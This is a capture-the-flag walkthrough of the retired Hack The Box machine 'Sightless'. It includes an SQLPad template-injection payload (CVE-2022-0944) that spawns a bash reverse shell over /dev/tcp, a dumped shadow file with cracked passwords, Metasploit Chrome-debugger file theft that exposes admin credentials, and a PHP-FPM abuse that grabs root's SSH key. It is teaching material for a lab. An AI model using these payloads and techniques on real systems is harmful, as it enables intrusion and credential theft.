Sightless

Synopsis

Sightless is a easy linux machine created by EmSec. The nmap discovers the ftp, ssh and http open ports. The web has a sightless.htb domain. The subdomain sqlpad.sightless.htb uses the sqlpad and it is vulnerable to CVE-2022-0944 RCE vulnerability. The exploit gives us the foothold to docker container as root user. The shadow file contains the hash of root and michael user. Cracking the password gives us a shell of michael user via ssh. Pilliaging the michael we discovers that the froxlor is running using port 8080, admin.sightless.htb vhost is present in /etc/hosts file, the user john has enabled the chrome remote debugger and running the administrator.py. Port forwarding and adding the vhost into the /etc/hosts gives us a froxlor login page. The metasploit is used for chrome remote debugger exploit to download the administrator.py file. The file contains the crediantials for froxlor login page. The froxlor has a php-fpm service installed. Enable the service and we can copy the id_rsa of root user by configuring the new php version.

Difficulty

Points

Release Date

Retired Date

Linux

Easy

07-09-2024

11-01-2025

Enumeration

Nmap

Started the nmap and found the ftp, ssh and http services running.

nmap -Pn -sC -sV --min-rate=500 10.10.11.32

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 02:18 EST
Nmap scan report for 10.10.11.32
Host is up (0.88s latency).
Not shown: 964 filtered tcp ports (no-response), 33 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|_    220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=1/8%Time=677E26F3%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,44,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.10\.11\.32\]\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.49 seconds

Add the sightless.htb in /etc/hosts file.

Web - sightless.htb

The website is hosted for giving the services for handling the IT infrastructure. The sqlpad and froxlor is used for handling databases and servers services.

The start now button in service section of sqlpad redirects us to sqlpad.sightless.htb subdomain and the froxlor redirects to froxlor main page.

Add the sqlpad.sightless.htb in /etc/hosts file.

Web - sqlpad.sightless.htb

SQLPad is a web application designed to help users write, run and visualize SQL queries. It supports a variety of databases including Postgres, MySQL, SQL Server, and others via ODBC.

Foothold

Searching the vulnerability for sqlpad in web leads me to CVE-2022-0944 RCE vulnerability. The PoC blog post of these vulnerability is published in huntr.

huntr - The world’s first bug bounty platform for AI/MLhuntr.com

Shell - Docker Container [root]

Add New Connection and choose MySQL Driver. In database section add the below payload.

{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{IP}/{PORT} 0>&1\"') }}

Start the nc listener in your local machine and click on test.

nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.32 48796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#

Pivoting

Shell - Docker Container [root] -> michael

The shadow file in docker container gives us the password hash for michael and it can be used for pivoting to system as a michael.

root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

Create the file., copy and paste both the hashes into the file. Crack the hash using hashcat.

hashcat -a 0 hash /usr/share/wordlists/rockyou.txt

The hash in the above command is a name of a file which contains the hash.

hashcat --show hash
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1800 | sha512crypt $6$, SHA512 (Unix) | Operating System

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:blindside
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse

ssh michael@10.10.11.32
michael@10.10.11.32's password: 
Last login: Tue Sep  3 11:52:02 2024 from 10.10.14.23
michael@sightless:~$

The user.txt file contains the user flag and we can read it 👏

Privilege Escalation

Pillaging - michael [user]

Michael doesn't have the privilage to run the sudo command. The netstat command lists us some of the open ports.

michael@sightless:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:42735         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:46215         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45813         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -

The port 8080 is used for hosting froxlor service. Port forward to local machine for further enumeration.

curl http://127.0.0.1:8080

<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
	<!-- Required meta tags -->
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta name="robots" content="noindex, nofollow, noarchive"/>
	<meta name="googlebot" content="nosnippet"/>
	<link rel="icon" type="image/x-icon" href="templates/Froxlor/assets/img/icon.png">
	<meta name="csrf-token" content="a447207d749fd9ae386af245d62cd982c4660eda" />
	<!-- Assets  -->
	<link rel="stylesheet" href="templates/Froxlor/build/assets/app-61450a15.css">
<script src="templates/Froxlor/build/assets/app-67d6acee.js" type="module"></script>

	<title>Froxlor</title>
</head>
<body id="app" class="min-vh-100 d-flex flex-column">
	
			<div class="container-fluid">
				<div class="container">
		<div class="row justify-content-center">
			<form class="col-12 max-w-420 d-flex flex-column" method="post" enctype="application/x-www-form-urlencoded">
				<img class="align-self-center my-5" src="templates/Froxlor/assets/img/logo.png" alt="Froxlor Server Management Panel"/>

				<div class="card shadow">
					<div class="card-body">
						<h5 class="card-title">Login</h5>
						<p>Please log in to access your account.</p>

						
						<div class="mb-3">
							<label for="loginname" class="col-form-label">Username</label>
							<input class="form-control" type="text" name="loginname" id="loginname" value="" required autofocus/>
						</div>

						<div class="mb-3">
							<label for="password" class="col-form-label">Password</label>
							<input class="form-control" type="password" name="password" id="password" value="" required/>
						</div>
					</div>

					<div class="card-body d-grid gap-2">
						<button class="btn btn-primary" type="submit" name="dologin">Login</button>
					</div>

											<div class="card-footer">
							<a class="card-link text-body-secondary" href="index.php?action=forgotpwd">Forgot your password?</a>
						</div>
									</div>
			</form>
		</div>
	</div>
			<footer class="text-center mb-3">
	<span>
		<img src="templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>
									&copy; 2009-2025 by <a href="https://www.froxlor.org/" rel="external" target="_blank">the froxlor team</a><br>
														</span>

    </footer>

		</div>
	</body>
</html>

ssh -L 8080:localhost:8080 michael@10.10.11.32

The /etc/hosts file has a admin.sightless.htb vhost for froxlor site. Add the admin.sightless.htb in your /etc/hosts file.

127.0.0.1        localhost admin.sightless.htb

The ps aux command reveals that the user john has a chrome remote debugger activated which can be used to find the credentials for above login.

ps aux | grep chrome
john        3704  0.3  0.3 33630172 15432 ?      Sl   15:19   0:01 /home/john/automation/chromedriver --port=57135
john        3709  0.0  0.0      0     0 ?        Z    15:19   0:00 [chromedriver] <defunct>
john        3711  0.5  2.9 34019516 115608 ?     Sl   15:19   0:02 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.WWQhV3 data:,
john        3717  0.0  0.0 33575860 1652 ?       Sl   15:19   0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john        3721  0.0  1.4 34112456 56964 ?      S    15:19   0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john        3722  0.0  1.4 34112452 57500 ?      S    15:19   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john        3739  0.3  3.0 34362352 122200 ?     Sl   15:19   0:01 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=3717 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --field-trial-handle=3,i,1381930
john        3740  0.1  2.1 33900068 87300 ?      Sl   15:19   0:00 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=3717 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,13819301115298270099,15471180059159053128,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john        3769  2.4  5.5 1186791276 218300 ?   Sl   15:19   0:09 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=3717 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1736345423887471 --launch-time-ticks=4118668471 --s
michael     4105  0.0  0.0   6612  2236 pts/3    S+   15:25   0:00 grep --color=auto chrome

The user john is also running the below command.

/usr/bin/python3 /home/john/automation/administration.py

Exploit - Chrome Remote Dubugger [Metasploit]

The exploit for chrome remote debugger is available in metasploit. I will be using it to download the administration.py file for getting the froxlor dashboard credentials.

Port Forward all the larger number ports.
Run the metasploit while adding all the ports until the administration.py file is downloaded

sudo msfdb run

[msf](Jobs:0 Agents:0) >> search debugger

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  auxiliary/gather/chrome_debugger       2019-09-24       normal     No     Chrome Debugger Arbitrary File Read / Arbitrary Web Request
   1  exploit/multi/misc/java_jdwp_debugger  2010-03-12       good       Yes    Java Debug Wire Protocol Remote Code Execution
   2    \_ target: Linux (Native Payload)    .                .          .      .
   3    \_ target: OSX (Native Payload)      .                .          .      .
   4    \_ target: Windows (Native Payload)  .                .          .      .
   5  exploit/linux/ssh/mercurial_ssh_exec   2017-04-18       excellent  No     Mercurial Custom hg-ssh Wrapper Remote Code Exec
   6  exploit/multi/misc/nodejs_v8_debugger  2016-08-15       excellent  Yes    NodeJS Debugger Command Injection
   7  exploit/multi/http/werkzeug_debug_rce  2015-06-28       excellent  Yes    Werkzeug Debug Shell Command Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/multi/http/werkzeug_debug_rce

[msf](Jobs:0 Agents:0) >> use 0
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> info
       Name: Chrome Debugger Arbitrary File Read / Arbitrary Web Request
     Module: auxiliary/gather/chrome_debugger
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-09-24

Provided by:
  Adam Baldwin (Evilpacket)
  Nicholas Starke (The King Pig Demon)

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILEPATH                   no        File to fetch from remote machine.
  RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT     9222             yes       The target port (TCP)
  TIMEOUT   10               yes       Time to wait for response
  URL                        no        Url to fetch from remote machine.

Description:
  This module uses the Chrome Debugger's API to read
  files off the remote file system, or to make web requests
  from a remote machine.  Useful for cloud metadata endpoints!


View the full module info with the info -d command.

[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RHOSTS localhost
RHOSTS => localhost
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RPORT 41429
RPORT => 41429
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> exploit -j
[*] Running module against 127.0.0.1

[*] Attempting Connection to ws://127.0.0.1:41429/devtools/page/B76FEFCB8EAE8305BE4A0ABD159F297D
[*] Opened connection
[*] Attempting to load url file:///home/john/automation/administration.py
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Stored file:///home/john/automation/administration.py at /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt
[*] Running module against ::1
[-] Bad Response
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >>

The port numbers may be different. In my case port 41429 is used by chrome remote debugger.

sudo cat /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
import time
import threading
import schedule

options = Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')

# Update this line with the path to your locally downloaded Chrome driver
chrome_driver_path = '/home/john/automation/chromedriver'

# Use Service to specify the Chrome driver binary path
service = Service(chrome_driver_path)
service.start()

driver = webdriver.Chrome(service=service, options=options)

def dismiss_all_alerts(driver):
    while True:
        try:
            alert = driver.switch_to.alert
            print(f"Dismissed alert with text: {alert.text}")
            alert.accept()
            time.sleep(1)
        except NoAlertPresentException:
            break

print("browser opened")
while True:
    try:
        driver.get("http://admin.sightless.htb:8080/admin_logger.php?page=log")
        time.sleep(7)

        # Username Field
        input_element = driver.find_element(By.ID, "loginname")
        input_element.send_keys("admin")

        # Password field
        input_element = driver.find_element(By.ID, "password")
        input_element.send_keys("ForlorfroxAdmin" + Keys.ENTER)
        print("Logged In...")
    except UnexpectedAlertPresentException:
        input_element.send_keys(Keys.ENTER)
        pass
    time.sleep(5)
    dismiss_all_alerts(driver)
    driver.get("http://admin.sightless.htb:8080/admin_index.php?action=logout")
    driver.get("http://admin.sightless.htb:8080/")
    print("Logged Out")
    time.sleep(3)
    #driver.close()
</pre></body></html>#

The credentials for froxlor dashboard is admin:ForlorfroxAdmin

Shell - root

The php-fpm can be used for getting shell as root or reading the root.txt file.

Enable the php-fpm: System > Settings > PHP-FPM

Copy the root id_rsa file or root.txt.

Change directory into /tmp and cat id_rsa

michael@sightless:~$ cd /tmp
michael@sightless:/tmp$ cat id_rsa

Copy the id_rsa and save it into your local machine. Change the permission and ssh into root.

chmod 600 id_rsa

ssh -i id_rsa root@10.10.11.32
Last login: Tue Sep  3 08:18:45 2024
root@sightless:~#

The root.txt file contains the root flag 🎉

PreviousMonitorsThree NextSeason 5

Last updated 10 months ago

hashtagSynopsis

hashtagEnumeration

hashtagNmap

hashtagWeb - sightless.htb

hashtagWeb - sqlpad.sightless.htb

hashtagFoothold

hashtagShell - Docker Container [root]

hashtagPivoting

hashtagShell - Docker Container [root] -> michael

hashtagPrivilege Escalation

hashtagPillaging - michael [user]

hashtagExploit - Chrome Remote Dubugger [Metasploit]

hashtagShell - root